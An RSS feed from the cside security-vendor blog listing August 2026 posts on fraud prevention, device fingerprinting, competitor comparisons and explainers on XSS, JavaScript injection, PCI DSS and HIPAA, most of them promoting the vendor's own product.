<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"><channel><title>cside Blog</title><description>Research and blogs about Client Side Security.</description><link>https://cside.com/</link><language>en</language><webMaster>hello@cside.com</webMaster><ttl>60</ttl><image><url>https://cside.com/android-chrome-192x192.png</url><title>cside Blog</title><link>https://cside.com/blog</link></image><item><title>9 best credential stuffing prevention tools in 2026, ranked</title><link>https://cside.com/blog/best-credential-stuffing-prevention-tools</link><guid isPermaLink="true">https://cside.com/blog/best-credential-stuffing-prevention-tools</guid><description>The best credential stuffing prevention tools for 2026, ranked, with cside first for device and bot detection, then 8 real tools compared honestly.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+credential+stuffing+prevention+tools+in+2026%2C+ranked&amp;bannerTitle=Best+credential+stuffing+prevention+tools&amp;point=cside+ranked+%231+for+credential+stuffing&amp;point=Device+ID+plus+bot+and+AI+agent+detection&amp;point=Catches+attacks+IP+rate+limiting+misses" length="0" type="image/webp"/></item><item><title>9 best device fingerprinting software in 2026, ranked and compared</title><link>https://cside.com/blog/best-device-fingerprinting-software</link><guid isPermaLink="true">https://cside.com/blog/best-device-fingerprinting-software</guid><description>The 9 best device fingerprinting software options for 2026, ranked, with cside first for a device ID plus a real-time fraud verdict from one first-party script.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+device+fingerprinting+software+in+2026%2C+ranked+and+compared&amp;bannerTitle=Best+device+fingerprinting+software+2026&amp;point=cside+ranked+%231%2C+device+ID+plus+verdict&amp;point=250%2B+signals%2C+first-party%2C+no+consent+banner&amp;point=9+tools+compared+with+honest+best-for+notes" length="0" type="image/webp"/></item><item><title>Best device intelligence for fraud prevention: 9 tools ranked for 2026</title><link>https://cside.com/blog/best-device-intelligence-for-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/best-device-intelligence-for-fraud-prevention</guid><description>The best device intelligence for fraud prevention in 2026, ranked. cside first for device ID plus a fraud verdict, then 8 real vendors compared.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+device+intelligence+for+fraud+prevention%3A+9+tools+ranked+for+2026&amp;bannerTitle=Best+device+intelligence+for+fraud&amp;point=cside+ranked+%231+for+fraud+prevention&amp;point=250%2B+signals+plus+real-time+verdict&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>Best device intelligence platforms in 2026, ranked and compared</title><link>https://cside.com/blog/best-device-intelligence-platforms</link><guid isPermaLink="true">https://cside.com/blog/best-device-intelligence-platforms</guid><description>Compare the best device intelligence platforms for 2026, ranked, with cside first for device ID plus AI agent, VPN, and bot detection from one script.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Best+device+intelligence+platforms+in+2026%2C+ranked+and+compared&amp;bannerTitle=Best+Device+Intelligence+Platforms+2026&amp;point=cside+ranked+%231+for+2026&amp;point=250%2B+signals+plus+a+fraud+verdict&amp;point=9+platforms+compared+and+ranked" length="0" type="image/webp"/></item><item><title>8 best digital skimming protection tools in 2026, ranked</title><link>https://cside.com/blog/best-digital-skimming-protection</link><guid isPermaLink="true">https://cside.com/blog/best-digital-skimming-protection</guid><description>Compare the 8 best digital skimming protection tools for 2026, ranked, with cside first for real-session script monitoring and PCI DSS coverage.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=8+best+digital+skimming+protection+tools+in+2026%2C+ranked&amp;bannerTitle=Best+digital+skimming+protection+2026&amp;point=cside+ranked+%231+for+skimming+protection&amp;point=Real-session+third-party+script+hashing&amp;point=PCI+DSS+6.4.3+and+11.6.1+coverage" length="0" type="image/webp"/></item><item><title>8 best Castle alternatives in 2026, cside compared</title><link>https://cside.com/blog/castle-alternatives</link><guid isPermaLink="true">https://cside.com/blog/castle-alternatives</guid><description>Looking for a Castle alternative? Compare the 8 best account-protection and device-intelligence tools for 2026, ranked, with cside first.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=8+best+Castle+alternatives+in+2026%2C+cside+compared&amp;bannerTitle=8+best+Castle+alternatives+in+2026&amp;point=cside+ranked+%231+Castle+alternative&amp;point=Device+ID+plus+AI+agent+detection&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>DataDome Pricing in 2026: Plans, Costs, and a Cheaper Alternative</title><link>https://cside.com/blog/datadome-pricing</link><guid isPermaLink="true">https://cside.com/blog/datadome-pricing</guid><description>What DataDome actually costs in 2026: its quote-based model, the public AWS Marketplace tiers, and how cside compares from $99/month with a free tier.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=DataDome+Pricing+in+2026%3A+Plans%2C+Costs%2C+and+a+Cheaper+Alternative&amp;bannerTitle=DataDome+pricing+explained+%282026%29&amp;point=DataDome+is+quote-based%2C+no+public+list&amp;point=AWS+Marketplace%3A+from+%243%2C830%2Fmonth&amp;point=cside+starts+at+%2499%2Fmonth%2C+free+tier" length="0" type="image/webp"/></item><item><title>DataDome vs Cloudflare: bot and client-side security compared (2026)</title><link>https://cside.com/blog/datadome-vs-cloudflare</link><guid isPermaLink="true">https://cside.com/blog/datadome-vs-cloudflare</guid><description>DataDome vs Cloudflare compared for bot management and client-side security: deployment, pricing, and use cases, plus where cside fits as a first-party third option.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=DataDome+vs+Cloudflare%3A+bot+and+client-side+security+compared+%282026%29&amp;bannerTitle=DataDome+vs+Cloudflare%3A+2026+compared&amp;point=DataDome%3A+specialized+bot+management&amp;point=Cloudflare%3A+edge+platform%2C+Page+Shield&amp;point=cside%3A+first-party+client-side+security" length="0" type="image/webp"/></item><item><title>DataDome vs Imperva: bot and client-side protection compared (2026)</title><link>https://cside.com/blog/datadome-vs-imperva</link><guid isPermaLink="true">https://cside.com/blog/datadome-vs-imperva</guid><description>DataDome vs Imperva compared for bot management and client-side protection: positioning, pricing, and use cases, plus where cside fits.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=DataDome+vs+Imperva%3A+bot+and+client-side+protection+compared+%282026%29&amp;bannerTitle=DataDome+vs+Imperva%3A+2026+comparison&amp;point=DataDome%3A+real-time+bot+management&amp;point=Imperva%3A+WAF+and+client-side+add-on&amp;point=cside%3A+first-party+signals+%2B+a+verdict" length="0" type="image/webp"/></item><item><title>Ecommerce Fraud Prevention: A Practical Guide for 2026</title><link>https://cside.com/blog/ecommerce-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/ecommerce-fraud-prevention</guid><description>A practical ecommerce fraud prevention guide: the main fraud types, how to stop each one, and a layered defense framework from browser to checkout.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Ecommerce+Fraud+Prevention%3A+A+Practical+Guide+for+2026&amp;bannerTitle=Ecommerce+fraud+prevention%3A+the+guide&amp;point=Stop+ATO%2C+card+testing%2C+and+chargebacks&amp;point=Layered+defense+from+browser+to+checkout&amp;point=Device+intelligence+plus+script+monitoring" length="0" type="image/webp"/></item><item><title>FingerprintJS pricing in 2026: free library vs Fingerprint Pro, explained</title><link>https://cside.com/blog/fingerprintjs-pricing</link><guid isPermaLink="true">https://cside.com/blog/fingerprintjs-pricing</guid><description>A clear guide to FingerprintJS pricing in 2026: the free open-source library versus Fingerprint Pro&apos;s per-API-call plans, plus a cheaper alternative.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=FingerprintJS+pricing+in+2026%3A+free+library+vs+Fingerprint+Pro%2C+explained&amp;bannerTitle=FingerprintJS+pricing+in+2026&amp;point=Free+library+vs+Fingerprint+Pro%2C+compared&amp;point=Pro+is+per+API+call%2C+no+free+Pro+tier&amp;point=cside%3A+%2499%2Fmo%2C+50%2C000+calls%2C+free+tier" length="0" type="image/webp"/></item><item><title>8 best GreyNoise alternatives and competitors in 2026</title><link>https://cside.com/blog/greynoise-alternatives</link><guid isPermaLink="true">https://cside.com/blog/greynoise-alternatives</guid><description>GreyNoise labels internet scan noise and IP reputation. Compare 8 GreyNoise alternatives for 2026, plus where cside adds browser-session signals.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=8+best+GreyNoise+alternatives+and+competitors+in+2026&amp;bannerTitle=8+GreyNoise+alternatives+for+2026&amp;point=Shodan%2C+Censys%2C+Spur+and+IPinfo+compared&amp;point=IP+threat+intel+and+scanner+detection&amp;point=Plus+cside+for+browser-session+signals" length="0" type="image/webp"/></item><item><title>How to prevent fake job applicants: a step-by-step guide for 2026</title><link>https://cside.com/blog/how-to-prevent-fake-job-applicants</link><guid isPermaLink="true">https://cside.com/blog/how-to-prevent-fake-job-applicants</guid><description>How to prevent fake job applicants: verify identity, read device and network signals during the application, and spot the red flags before you hire.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+prevent+fake+job+applicants%3A+a+step-by-step+guide+for+2026&amp;bannerTitle=How+to+prevent+fake+job+applicants&amp;point=Spot+VMs%2C+VPNs%2C+and+remote-control+tools&amp;point=Catch+interview+proxies+and+fake+identities&amp;point=Device+signals+during+the+application" length="0" type="image/webp"/></item><item><title>How to Prevent JavaScript Injection: A Practical Step-by-Step Guide</title><link>https://cside.com/blog/how-to-prevent-javascript-injection</link><guid isPermaLink="true">https://cside.com/blog/how-to-prevent-javascript-injection</guid><description>A practical guide to preventing JavaScript injection: fix XSS, lock down third-party scripts with CSP and SRI, and monitor real browser sessions.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=How+to+Prevent+JavaScript+Injection%3A+A+Practical+Step-by-Step+Guide&amp;bannerTitle=How+to+prevent+JavaScript+injection&amp;point=Close+XSS+with+encoding+and+safe+sinks&amp;point=Lock+third-party+scripts+with+CSP+and+SRI&amp;point=Catch+injection+in+real+browser+sessions" length="0" type="image/webp"/></item><item><title>9 best IPQualityScore alternatives in 2026, cside compared</title><link>https://cside.com/blog/ipqualityscore-alternatives</link><guid isPermaLink="true">https://cside.com/blog/ipqualityscore-alternatives</guid><description>Looking for an IPQualityScore alternative? Compare 9 IPQS alternatives for 2026, ranked, with cside first for first-party device and VPN detection.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+IPQualityScore+alternatives+in+2026%2C+cside+compared&amp;bannerTitle=9+IPQualityScore+alternatives+in+2026&amp;point=cside%3A+%231+IPQualityScore+alternative&amp;point=Device+signals+%2B+VPN%2Fproxy+detection&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>Jscrambler pricing in 2026: plans, model, and what to expect</title><link>https://cside.com/blog/jscrambler-pricing</link><guid isPermaLink="true">https://cside.com/blog/jscrambler-pricing</guid><description>A buyer&apos;s guide to Jscrambler pricing in 2026: its quote-based model, the two products it sells, and how it compares to cside&apos;s public client-side security prices.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Jscrambler+pricing+in+2026%3A+plans%2C+model%2C+and+what+to+expect&amp;bannerTitle=Jscrambler+pricing+in+2026&amp;point=Quote-based+pricing%2C+no+public+price+list&amp;point=Two+products%3A+code+and+webpage+integrity&amp;point=cside+publishes+prices+from+%2499%2Fmonth" length="0" type="image/webp"/></item><item><title>9 best Kount alternatives and competitors in 2026, ranked</title><link>https://cside.com/blog/kount-alternatives</link><guid isPermaLink="true">https://cside.com/blog/kount-alternatives</guid><description>Looking for a Kount alternative? Compare the 9 best fraud-prevention platforms for 2026, ranked, with cside first for device intelligence and chargeback proof.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+Kount+alternatives+and+competitors+in+2026%2C+ranked&amp;bannerTitle=9+best+Kount+alternatives+in+2026&amp;point=cside+ranked+%231+Kount+alternative&amp;point=Device+intelligence+plus+chargeback+proof&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>9 best new account fraud prevention tools in 2026, ranked</title><link>https://cside.com/blog/new-account-fraud-prevention-tools</link><guid isPermaLink="true">https://cside.com/blog/new-account-fraud-prevention-tools</guid><description>The 9 best new account fraud prevention tools for 2026, ranked, with cside first for device intelligence at signup that catches fraud before the account exists.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+new+account+fraud+prevention+tools+in+2026%2C+ranked&amp;bannerTitle=New+account+fraud+prevention+tools+2026&amp;point=cside+ranked+%231+for+signup+fraud&amp;point=Device+intelligence+at+account+signup&amp;point=Catches+AI+agents+and+multi-accounting" length="0" type="image/webp"/></item><item><title>Online payment fraud prevention: a practical guide for 2026</title><link>https://cside.com/blog/online-payment-fraud-prevention</link><guid isPermaLink="true">https://cside.com/blog/online-payment-fraud-prevention</guid><description>A practical guide to online payment fraud prevention: the main fraud types, the prevention layers that stop them, and where device evidence at checkout fits.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=Online+payment+fraud+prevention%3A+a+practical+guide+for+2026&amp;bannerTitle=Online+payment+fraud+prevention&amp;point=Stop+card+testing+and+carding+at+checkout&amp;point=Device+intelligence+flags+risky+sessions&amp;point=Chargeback+evidence+in+Visa+CE+3.0+format" length="0" type="image/webp"/></item><item><title>PerimeterX Pricing in 2026: What HUMAN Security Costs (and a Transparent Alternative)</title><link>https://cside.com/blog/perimeterx-pricing</link><guid isPermaLink="true">https://cside.com/blog/perimeterx-pricing</guid><description>PerimeterX (now HUMAN Security) has no public pricing. Here is the known model in 2026, its modules, and a transparent, listed-price alternative.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PerimeterX+Pricing+in+2026%3A+What+HUMAN+Security+Costs+%28and+a+Transparent+Alternative%29&amp;bannerTitle=PerimeterX+pricing+%28now+HUMAN%29+2026&amp;point=No+public+pricing%3A+custom+quote+only&amp;point=Volume-based+enterprise+annual+contracts&amp;point=cside+lists+pricing+from+a+free+tier" length="0" type="image/webp"/></item><item><title>9 best Sardine alternatives in 2026, compared</title><link>https://cside.com/blog/sardine-alternatives</link><guid isPermaLink="true">https://cside.com/blog/sardine-alternatives</guid><description>Looking for a Sardine alternative or competitor? Compare the 9 best fraud and device-intelligence options for 2026, ranked, with honest verdicts.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+Sardine+alternatives+in+2026%2C+compared&amp;bannerTitle=9+Sardine+alternatives+in+2026&amp;point=cside+ranked+%231+Sardine+alternative&amp;point=Device+intelligence+%2B+AI+agent+detection&amp;point=First-party+script%2C+PCI+6.4.3+covered" length="0" type="image/webp"/></item><item><title>9 best SEON alternatives in 2026, cside compared</title><link>https://cside.com/blog/seon-alternatives</link><guid isPermaLink="true">https://cside.com/blog/seon-alternatives</guid><description>Looking for a SEON alternative? Compare the 9 best SEON competitors for 2026, ranked, with cside first for device intelligence and fraud signals.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+SEON+alternatives+in+2026%2C+cside+compared&amp;bannerTitle=9+SEON+alternatives+in+2026&amp;point=cside+ranked+%231+SEON+alternative&amp;point=Device+ID+plus+AI+agent+and+VPN+detection&amp;point=Free+tier%3A+1%2C000+API+calls+per+month" length="0" type="image/webp"/></item><item><title>SEON vs Fingerprint: fraud detection compared (2026)</title><link>https://cside.com/blog/seon-vs-fingerprint</link><guid isPermaLink="true">https://cside.com/blog/seon-vs-fingerprint</guid><description>SEON vs Fingerprint compared for fraud detection: positioning, pricing, and use cases, plus where cside fits as a first-party third option.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=SEON+vs+Fingerprint%3A+fraud+detection+compared+%282026%29&amp;bannerTitle=SEON+vs+Fingerprint%3A+2026+comparison&amp;point=SEON%3A+full+anti-fraud+and+AML+suite&amp;point=Fingerprint%3A+hosted+device+ID+API&amp;point=cside%3A+first-party+signals+plus+a+verdict" length="0" type="image/webp"/></item><item><title>7 best Stytch alternatives in 2026, ranked for auth and fraud teams</title><link>https://cside.com/blog/stytch-alternatives</link><guid isPermaLink="true">https://cside.com/blog/stytch-alternatives</guid><description>Comparing Stytch alternatives? Here are 7 real auth and CIAM options ranked, plus where cside fits as a complementary device and fraud signal layer.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=7+best+Stytch+alternatives+in+2026%2C+ranked+for+auth+and+fraud+teams&amp;bannerTitle=7+Stytch+alternatives+in+2026&amp;point=7+real+auth+and+CIAM+Stytch+alternatives&amp;point=Honest+fit+notes+for+each+platform&amp;point=Where+cside+complements%2C+not+replaces%2C+auth" length="0" type="image/webp"/></item><item><title>9 best ThumbmarkJS alternatives in 2026, ranked and compared</title><link>https://cside.com/blog/thumbmarkjs-alternatives</link><guid isPermaLink="true">https://cside.com/blog/thumbmarkjs-alternatives</guid><description>Looking for a ThumbmarkJS alternative? Compare the 9 best options for 2026, ranked, with cside first for a first-party device ID plus a fraud verdict.</description><pubDate>Fri, 21 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=9+best+ThumbmarkJS+alternatives+in+2026%2C+ranked+and+compared&amp;bannerTitle=9+ThumbmarkJS+alternatives+in+2026&amp;point=cside+ranked+%231+ThumbmarkJS+alternative&amp;point=Device+ID+plus+AI+agent+and+VPN+detection&amp;point=First-party+script%2C+no+per-call+surprises" length="0" type="image/webp"/></item><item><title>What Causes Third-Party JavaScript Security Risks</title><link>https://cside.com/blog/what-causes-third-party-javascript-security-risks</link><guid isPermaLink="true">https://cside.com/blog/what-causes-third-party-javascript-security-risks</guid><description>Third-party scripts execute with full browser access. Learn what makes third-party JavaScript a security risk and why server-side tools miss it.</description><pubDate>Wed, 19 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Causes+Third-Party+JavaScript+Security+Risks&amp;bannerTitle=Third-Party+JavaScript+Security+Risks&amp;point=Scripts+run+with+full+browser+access&amp;point=Supply-chain+hits+thousands+at+once&amp;point=Server-side+tools+miss+the+browser" length="0" type="image/webp"/></item><item><title>What Is Data Skimming Protection for Ecommerce</title><link>https://cside.com/blog/what-is-data-skimming-protection-for-ecommerce</link><guid isPermaLink="true">https://cside.com/blog/what-is-data-skimming-protection-for-ecommerce</guid><description>Data skimming steals card data in the browser, invisible to server tools. Learn what data skimming protection is and how to stop Magecart attacks.</description><pubDate>Wed, 19 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Mike Kutlu</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Data+Skimming+Protection+for+Ecommerce&amp;bannerTitle=Data+Skimming+Protection+for+Ecommerce&amp;point=Card+theft+happens+in+the+browser&amp;point=WAFs+and+CSPs+miss+runtime+scripts&amp;point=PCI+DSS+4.0.1+monitoring%2C+automated" length="0" type="image/webp"/></item><item><title>What Is a Business Associate Agreement (BAA)? HIPAA BAAs Explained</title><link>https://cside.com/blog/what-is-a-business-associate-agreement</link><guid isPermaLink="true">https://cside.com/blog/what-is-a-business-associate-agreement</guid><description>A Business Associate Agreement (BAA) is a HIPAA-required contract between a covered entity and a vendor that handles protected health information on its behalf, binding the vendor to safeguard that data. This guide explains what a BAA covers, who needs one, and why some website vendors refuse to sign.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+a+Business+Associate+Agreement+%28BAA%29%3F+HIPAA+BAAs+Explained&amp;bannerTitle=What+is+a+BAA%3F&amp;point=The+HIPAA+contract+for+PHI+vendors&amp;point=Covered+entity+vs+business+associate&amp;point=Why+ad+vendors+won%27t+sign+one" length="0" type="image/webp"/></item><item><title>What Is an Approved Scanning Vendor (ASV)? PCI ASV Scans Explained</title><link>https://cside.com/blog/what-is-asv-scanning</link><guid isPermaLink="true">https://cside.com/blog/what-is-asv-scanning</guid><description>An Approved Scanning Vendor (ASV) is a company certified by the PCI Security Standards Council to run the external vulnerability scans that PCI DSS requirement 11.3.2 mandates every quarter. This guide explains what an ASV scan covers, how it differs from internal scans and penetration tests, and what it cannot see.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+an+Approved+Scanning+Vendor+%28ASV%29%3F+PCI+ASV+Scans+Explained&amp;bannerTitle=What+is+an+ASV+scan%3F&amp;point=PCI%27s+quarterly+external+scan+explained&amp;point=ASV+vs+internal+scan+vs+pentest&amp;point=What+ASV+scans+cannot+see" length="0" type="image/webp"/></item><item><title>What Is Cardholder Data (CHD)? PCI Definitions, CDE, and SAD Explained</title><link>https://cside.com/blog/what-is-cardholder-data</link><guid isPermaLink="true">https://cside.com/blog/what-is-cardholder-data</guid><description>Cardholder data (CHD) is the payment card information PCI DSS exists to protect: the primary account number alone or with the cardholder&apos;s name, expiration date, or service code. This guide defines CHD, sensitive authentication data (SAD), and the cardholder data environment (CDE), and explains what each means for scope.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Cardholder+Data+%28CHD%29%3F+PCI+Definitions%2C+CDE%2C+and+SAD+Explained&amp;bannerTitle=What+is+cardholder+data%3F&amp;point=CHD%2C+SAD%2C+and+the+CDE+defined&amp;point=What+PCI+DSS+lets+you+store&amp;point=Where+card+data+actually+leaks" length="0" type="image/webp"/></item><item><title>What Is Customer Journey Hijacking? How Injected Scripts Steal Shoppers</title><link>https://cside.com/blog/what-is-customer-journey-hijacking</link><guid isPermaLink="true">https://cside.com/blog/what-is-customer-journey-hijacking</guid><description>Customer journey hijacking is the manipulation of a visitor&apos;s session by unauthorized code (injected ads, forced redirects, swapped affiliate tags) that diverts them away from the intended purchase path. This guide explains how it happens, what it costs, and how to see it on your own site.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+Customer+Journey+Hijacking%3F+How+Injected+Scripts+Steal+Shoppers&amp;bannerTitle=Customer+journey+hijacking&amp;point=Injected+code+diverting+your+visitors&amp;point=Client-side+vs+site-side+injection&amp;point=The+conversion+tax+you+cannot+see" length="0" type="image/webp"/></item><item><title>What Is DOM-Based XSS? How DOM Cross-Site Scripting Works</title><link>https://cside.com/blog/what-is-dom-based-xss</link><guid isPermaLink="true">https://cside.com/blog/what-is-dom-based-xss</guid><description>DOM-based XSS is a cross-site scripting attack where the vulnerability lives entirely in client-side JavaScript: the page&apos;s own code reads attacker-controlled input and writes it into the DOM unsafely. This guide explains how it differs from reflected and stored XSS, common sources and sinks, and how to detect it.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+DOM-Based+XSS%3F+How+DOM+Cross-Site+Scripting+Works&amp;bannerTitle=What+is+DOM-based+XSS%3F&amp;point=The+XSS+class+servers+never+see&amp;point=Sources%2C+sinks%2C+and+payload+flow&amp;point=Why+WAFs+and+CSP+miss+it" length="0" type="image/webp"/></item><item><title>What Is ePHI? Electronic Protected Health Information Under HIPAA Explained</title><link>https://cside.com/blog/what-is-ephi</link><guid isPermaLink="true">https://cside.com/blog/what-is-ephi</guid><description>ePHI is electronic protected health information: any individually identifiable health data that is created, stored, or transmitted electronically, and that HIPAA requires covered entities and business associates to safeguard. This guide defines ePHI, distinguishes it from PHI and de-identified data, and lists the 18 HIPAA identifiers.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+ePHI%3F+Electronic+Protected+Health+Information+Under+HIPAA+Explained&amp;bannerTitle=What+is+ePHI%3F&amp;point=ePHI+vs+PHI+vs+de-identified+data&amp;point=The+18+HIPAA+identifiers&amp;point=How+tracking+pixels+leak+ePHI" length="0" type="image/webp"/></item><item><title>What Is JavaScript Injection? Script Injection Attacks Explained</title><link>https://cside.com/blog/what-is-javascript-injection</link><guid isPermaLink="true">https://cside.com/blog/what-is-javascript-injection</guid><description>JavaScript injection is the insertion of attacker-controlled script into a web page so it executes in visitors&apos; browsers with the page&apos;s full privileges. This guide covers the injection paths (XSS, compromised third parties, extensions), what injected scripts actually do, and how to detect them.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+JavaScript+Injection%3F+Script+Injection+Attacks+Explained&amp;bannerTitle=What+is+JavaScript+injection%3F&amp;point=Every+path+foreign+code+takes+into+a+page&amp;point=What+injected+scripts+can+do&amp;point=Detection+at+the+browser+layer" length="0" type="image/webp"/></item><item><title>PCI DSS Report on Compliance (RoC): What It Is and When You Need One</title><link>https://cside.com/blog/what-is-pci-dss-report-on-compliance</link><guid isPermaLink="true">https://cside.com/blog/what-is-pci-dss-report-on-compliance</guid><description>A PCI DSS Report on Compliance is required for Level 1 merchants and service providers. Learn what a RoC covers, who signs it, and how to prepare.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=PCI+DSS+Report+on+Compliance+%28RoC%29%3A+What+It+Is+and+When+You+Need+One&amp;bannerTitle=PCI+DSS+Report+on+Compliance&amp;point=Required+for+Level+1+merchants&amp;point=Signed+by+a+QSA%2C+not+self-attested&amp;point=Covers+all+12+PCI+DSS+requirements" length="0" type="image/webp"/></item><item><title>What Is PII Harvesting? How Scripts Collect Personal Data at Scale</title><link>https://cside.com/blog/what-is-pii-harvesting</link><guid isPermaLink="true">https://cside.com/blog/what-is-pii-harvesting</guid><description>PII harvesting is the systematic collection of personally identifiable information from websites and forms, usually by scripts that read what users type, sometimes criminal, sometimes an over-collecting vendor tag. This guide explains the techniques, the difference from PII itself, and how to see harvesting on your own pages.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+PII+Harvesting%3F+How+Scripts+Collect+Personal+Data+at+Scale&amp;bannerTitle=What+is+PII+harvesting%3F&amp;point=Scripts+reading+personal+data+at+scale&amp;point=Criminal+and+misconfigured+collection&amp;point=How+to+see+it+on+your+own+pages" length="0" type="image/webp"/></item><item><title>What Is RASP? Runtime Application Self-Protection Defined</title><link>https://cside.com/blog/what-is-rasp</link><guid isPermaLink="true">https://cside.com/blog/what-is-rasp</guid><description>RASP (Runtime Application Self-Protection) is a security technology that runs inside an application and blocks attacks from within at runtime, using the application&apos;s own context. This guide defines RASP, compares it to WAFs, and explains where its server-side model stops, and what plays the equivalent role in the browser.</description><pubDate>Tue, 18 Aug 2026 00:00:00 GMT</pubDate><category>Blog</category><category>security</category><author>Simon Wijckmans</author><enclosure url="https://og.cside.com/blog-banner.webp?title=What+Is+RASP%3F+Runtime+Application+Self-Protection+Defined&amp;bannerTitle=What+is+RASP%3F&amp;point=Runtime+protection+from+inside+the+app&amp;point=RASP+vs+WAF+vs+browser+monitoring&amp;point=Where+the+server-side+model+stops" length="0" 